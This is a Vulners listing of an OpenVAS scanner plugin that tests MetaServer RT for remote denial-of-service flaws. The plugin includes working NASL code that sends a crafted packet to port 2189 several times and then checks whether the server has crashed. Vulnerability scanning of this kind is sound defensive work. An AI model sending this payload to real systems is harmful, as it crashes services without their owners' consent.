Lucene search
K

MetaServer RT Multiple Remote Denial of Service Vulnerabilities

🗓️ 22 Sep 2011 00:00:00Reported by Copyright (C) 2011 SecPodType 
openvas
 openvas
🔗 plugins.openvas.org👁 13 Views

MetaServer RT Multiple Remote Denial of Service Vulnerabilities. Multiple flaws due to error processing certain packets, can cause crash via a specially crafted packet. No solution or patch available for at least one year

Refs
Code
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_metaserver_rt_multiple_dos_vuln.nasl 7015 2017-08-28 11:51:24Z teissa $
#
# MetaServer RT Multiple Remote Denial of Service Vulnerabilities
#
# Authors:
# Sooraj KS <[email protected]>
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation may allow remote attackers to execute
arbitrary code on the system or cause a denial of service condition.

Impact Level: System/Application";

tag_affected = "MetaServer RT version 3.2.1.450 and prior.";

tag_insight = "Multiple flaws are due to an error when processing certain
packets and can be exploited to cause a crash via a specially crafted packet.";

tag_solution = "No solution or patch was made available for at least one year
since disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.";

tag_summary = "The host is running MetaServer RT and is prone to multiple remote
denial of service vulnerabilities.";

if(description)
{
  script_id(902569);
  script_version("$Revision: 7015 $");
  script_tag(name:"last_modification", value:"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $");
  script_tag(name:"creation_date", value:"2011-09-22 10:24:03 +0200 (Thu, 22 Sep 2011)");
  script_bugtraq_id(49696);
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("MetaServer RT Multiple Remote Denial of Service Vulnerabilities");
  script_xref(name : "URL" , value : "http://secunia.com/advisories/46059");
  script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/17879/");
  script_xref(name : "URL" , value : "http://aluigi.altervista.org/adv/metaserver_1-adv.txt");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2011 SecPod");
  script_family("Denial of Service");
  script_dependencies("find_service.nasl");
  script_require_ports(2189);
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_tag(name:"solution_type", value:"WillNotFix");
  exit(0);
}


## Get Default Port
port = 2189;
if(!get_port_state(port)){
 exit(0);
}

## Open the socket
soc = open_sock_tcp(port);
if(!soc){
  exit(0);
}

## Construct Attack Request
req = raw_string( 0xcd, 0xab, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x52, 0x4f, 0x53, 0x43,
                  0x4f );

## Sending Attack
send(socket:soc, data:req);
res = recv(socket:soc, length:200);
close(soc);

## Confirm the application
if("Metastock" >!< res){
  exit(0);
}

## Send multiple reconnection request
for(i = 0; i < 5; i++)
{
  soc1 = open_sock_tcp(port);
  if(!soc1){
    break;
  }

  send(socket:soc1, data:req);
  close(soc1);
  sleep(1);
}

## Open the socket and Check server is dead or alive
soc = open_sock_tcp(port);
if(!soc)
{
  security_message(port);
  exit(0);
}
close(soc);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation